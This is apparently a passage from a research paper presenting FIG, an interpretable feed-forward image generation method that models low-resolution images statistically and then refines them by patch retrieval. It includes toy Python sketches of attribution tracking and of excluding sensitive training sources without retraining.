Although generative adversarial networks (GANs) and diffusion models achieve impressive realism through neural networks and backpropagation, the learned representations and latent spaces lack clear attribution and interpretability. Understanding the generation process requires auxiliary probing or post-hoc analysis. Empirical studies suggest that some models implicitly follow a coarse-to-fine generation mechanism, in which early stages determine the global structure and layout, and later stages progressively refine details and inject texture and style. This work explicitly formalizes this mechanism and presents a feed-forward image generation (FIG) process with well-defined objectives at each stage. FIG statistically models the lowest-resolution images and then progressively refines them. Unlike neural generative models, FIG provides explicit interpretability and attribution. Each generated region can be traced to its associated source and refinement. This property facilitates controllability, supports privacy-aware generation without retraining, and allows transparent manipulation of generated content. Compared to representative baselines based on GAN and diffusion, FIG achieves competitive visual quality, offers superior interpretability, and improves robustness in data-sparse regimes.
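The two-stage pipeline described above (statistically modeling the lowest-resolution images, then refining regions while recording where each came from) can be illustrated with a toy sketch. This is a hypothetical minimal example, not the FIG implementation: the per-pixel Gaussian low-resolution model, the patch-mean matching rule, and all array shapes are illustrative assumptions.

```python
import numpy as np

rng = np.random.default_rng(0)

# Hypothetical toy "training set": 8 grayscale images of size 16x16.
train = rng.random((8, 16, 16))

def downsample(img, f=4):
    """Average-pool an image by a factor of f in each dimension."""
    h, w = img.shape
    return img.reshape(h // f, f, w // f, f).mean(axis=(1, 3))

# Stage 1: statistically model the lowest-resolution images.
# Here: a simple per-pixel Gaussian fit to the downsampled training set.
low = np.stack([downsample(t) for t in train])          # shape (8, 4, 4)
coarse = rng.normal(low.mean(axis=0), low.std(axis=0))  # sampled 4x4 layout

# Stage 2: refine each coarse cell by retrieving the best-matching training
# patch, recording attribution (which training image each region came from).
out = np.zeros((16, 16))
attribution = np.zeros((4, 4), dtype=int)  # source index per region
for i in range(4):
    for j in range(4):
        # Pick the training image whose patch mean best matches the coarse value.
        src = int(np.argmin(np.abs(low[:, i, j] - coarse[i, j])))
        attribution[i, j] = src
        out[i*4:(i+1)*4, j*4:(j+1)*4] = train[src, i*4:(i+1)*4, j*4:(j+1)*4]
```

Because every output region carries an entry in `attribution`, each generated detail can be traced back to its source sample, which is the property the abstract highlights.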

We introduced FIG, an interpretable and fully feed-forward image generation framework that formalizes the separation between global structure modeling and local detail refinement. FIG records pixel-level attribution throughout multi-resolution enhancement, enabling each synthesized detail to be attributed, controlled, or selectively modified. This design enables control over the global appearance, semantic attributes, and localized regions without affecting the rest of the image. Furthermore, the transparent retrieval process supports source-aware filtering, allowing selective exclusion of sensitive training samples without retraining. Extensive benchmark results demonstrate that FIG maintains competitive generation quality while offering these interpretability and controllability benefits.
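The source-aware filtering described above can be sketched as retrieval with an exclusion mask over source identities. This is a hypothetical minimal illustration, not the FIG retrieval procedure: the nearest-patch distance, the `retrieve` helper, and the toy patch database are all assumed names and shapes.

```python
import numpy as np

rng = np.random.default_rng(1)

# Toy retrieval database: 6 candidate patches, each tagged with a source id.
patches = rng.random((6, 4, 4))
source_ids = np.array([0, 1, 2, 3, 4, 5])
query = rng.random((4, 4))

def retrieve(query, patches, source_ids, excluded=()):
    """Nearest-patch retrieval that can never return an excluded source."""
    dists = np.linalg.norm((patches - query).reshape(len(patches), -1), axis=1)
    dists[np.isin(source_ids, list(excluded))] = np.inf  # mask sensitive sources
    idx = int(np.argmin(dists))
    return patches[idx], int(source_ids[idx])

best, src = retrieve(query, patches, source_ids)
# Excluding a sensitive source requires no retraining: the same database is
# reused, and retrieval simply falls back to the next-best allowed patch.
filtered, src2 = retrieve(query, patches, source_ids, excluded={src})
```

Because attribution is recorded explicitly, exclusion is a filtering step at generation time rather than a model update, which is what makes retraining unnecessary.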
